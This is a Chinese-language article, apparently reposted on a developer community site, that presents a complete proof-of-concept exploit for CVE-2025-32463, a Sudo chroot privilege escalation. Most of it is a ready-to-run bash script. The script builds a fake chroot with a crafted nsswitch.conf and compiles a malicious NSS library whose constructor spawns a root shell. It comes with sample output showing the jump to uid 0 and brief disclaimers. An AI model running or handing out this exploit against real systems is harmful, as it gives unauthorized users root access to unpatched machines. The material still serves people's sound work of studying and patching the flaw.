
这是一个针对CVE-2025-32463漏洞的概念验证(PoC)利用脚本,该漏洞存在于Sudo 1.9.14至1.9.17版本中。通过滥用--chroot选项并操纵nsswitch.conf的加载过程,攻击者可以诱使Sudo加载恶意的共享库,从而获得root权限。
CVE-2025-32463是一个在Sudo版本1.9.14至1.9.17中的本地权限提升漏洞。它通过操纵Sudo处理nsswitch.conf的方式滥用--chroot(-R)选项。这使得本地攻击者可以诱骗Sudo加载恶意共享库,获得root访问权限,即使他们不在sudoers文件中。
该脚本执行以下步骤:
nsswitch.conf# 检查当前用户权限
$ id
uid=1000(testuser) gid=1000(testuser) groups=1000(testuser)
# 执行利用脚本
$ ./CVE-2025-32463.sh
woot!!!
# 成功后会获得root shell
# id
uid=0(root) gid=0(root) groups=0(root)sudo --version--chroot选项#!/bin/bash
# -----------------------------------------
# sudo-chwoot.sh
# Proof-of-Concept Exploit for CVE-2025-32463
# Local Privilege Escalation via Sudo chroot
#
# Created by: Blackash >>> B1ack4sh
#
# DISCLAIMER:
# This script is for educational and authorized testing purposes only.
# Do not use on systems you do not own or have explicit permission to test.
# -----------------------------------------
# 创建临时目录用于存放利用文件
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
# 创建恶意共享库的C源代码
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
// 使用构造函数属性,确保库加载时自动执行
__attribute__((constructor)) void woot(void) {
setreuid(0,0); // 设置真实和有效用户ID为root
setregid(0,0); // 设置真实和有效组ID为root
chdir("/"); // 切换到根目录
execl("/bin/bash", "/bin/bash", NULL); // 执行root shell
}
EOF
# 创建虚假的chroot环境结构
mkdir -p woot/etc libnss_
# 创建恶意的nsswitch.conf,指定使用自定义的解析方法
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
# 复制group文件以保持环境完整性
cp /etc/group woot/etc
# 编译恶意共享库,使用-woot作为初始化函数
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!!!"
# 触发漏洞:使用-R选项指定chroot目录,执行woot命令
sudo -R woot woot
# 清理临时文件
rm -rf ${STAGE?}__attribute__((constructor))确保自动执行woot/etc/nsswitch.conf文件passwd解析使用自定义方法/woot1337-woot作为共享库的初始化函数libnss_目录中sudo -R woot woot命令-R woot指定chroot目录woot触发恶意共享库的加载此PoC仅供教育和授权测试目的使用。未经明确许可,在任何系统上运行此脚本是非法的且不道德的。仅在你拥有或已获得明确测试权限的系统上使用。开发者和发布者不对任何滥用行为负责。
该漏洞利用了Sudo在处理chroot环境时对nsswitch.conf配置的信任问题。当Sudo在chroot环境中查找用户/组信息时,它会加载配置的NSS模块,攻击者可以通过替换这些模块来执行任意代码。
关键教训: 即使是不在sudoers文件中的用户,也可能通过滥用此漏洞获得root权限。这是一个影响众多系统的严重问题,应立即修补。FINISHED
6HFtX5dABrKlqXeO5PUv/84SoIo+TE3firf/5vX8AZ5sDJoeQl9XHGOAaMiSREtQ
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。